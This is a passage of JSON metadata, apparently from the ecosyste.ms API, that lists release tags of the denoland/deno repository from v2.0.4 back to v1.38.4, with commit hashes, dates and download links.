.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denolan